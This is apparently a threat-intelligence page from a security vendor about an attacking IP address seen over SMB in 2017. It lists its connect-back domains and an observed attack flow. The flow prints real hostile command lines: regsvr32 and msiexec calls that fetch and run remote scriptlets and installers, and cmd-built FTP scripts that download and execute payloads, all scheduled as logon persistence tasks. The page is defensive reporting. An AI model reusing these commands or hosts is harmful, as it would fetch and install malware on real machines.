IP Address: 182.18.21.227 (Previously Malicious)

This IP address attempted an attack on a machine protected by Guardicore Centra

Threat Information

Role

Attacker

Services Targeted

SMB

Tags

Access Suspicious Domain, SMB, Scheduled Task Creation, Cookie Hijacking, Modification, SMB Null Session Login, DNS Query, Outgoing Connection, File Operation By CMD, Modification, Persistency - Logon, CMD

Connect Back Servers

wmi.mykings.top
down.oo000oo.club
down.mysking.info
js.oo000oo.club
wmi.oo000oo.club
js.mykings.top

23.27.127.254
23.27.127.106

Basic Information

IP Address

182.18.21.227

Domain

-

ISP

Beijing yiantianxia Network Science&Technology Co

Country

China

WHOIS

Created Date

-

Updated Date

-

Organization

-

First seen in Guardicore Centra

2017-05-21

Last seen in Guardicore Centra

2017-05-25

What is Guardicore Centra
Guardicore Centra is a data center and cloud security solution that protects the organization's core assets, using flexible, quickly deployed and easy to understand micro-segmentation controls. Centra generates in-context security incidents, with details on attacker tools and techniques, that help IR teams prioritize incident investigation and reduce dwell time.

Attack Flow

Process c:\windows\system32\lsass.exe attempted to access suspicious domains: down.oo000oo.club

DNS Query, Access Suspicious Domain, Outgoing Connection

Process c:\windows\system32\lsass.exe generated outgoing network traffic to: 23.27.127.106:8888

Outgoing Connection

c:\windows\system32\reg.exe set the command line regsvr32 /u /s /i:http://js.5b6b7b.ru:280/v.sct scrobj.dll to run using Persistency - Logon

Persistency - Logon

c:\windows\system32\taskkill.exe set the command line msiexec.exe /i http://js.5b6b7b.ru:280/helloworld.msi /q to run using Persistency - Logon

Persistency - Logon

The command line cmd /c echo open down.5b6b7b.ru>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe>>s&echo bye>>s&ftp -s:s&a.exe was scheduled to run by modifying C:\WINDOWS\Tasks\Mysa.job

The command line C:\WINDOWS\system32\rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa was scheduled to run by modifying C:\WINDOWS\Tasks\Mysa1.job

The command line cmd /c echo open ftp.oo000oo.me>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p was scheduled to run by modifying C:\WINDOWS\Tasks\Mysa2.job

Process c:\windows\system32\wbem\scrcons.exe attempted to access suspicious domains: wmi.oo000oo.club

DNS Query, Access Suspicious Domain, Outgoing Connection

Process c:\windows\system32\wbem\scrcons.exe generated outgoing network traffic to: 23.27.127.106:8888

Outgoing Connection

Process c:\windows\system32\regsvr32.exe attempted to access suspicious domains: js.oo000oo.club

DNS Query, Access Suspicious Domain
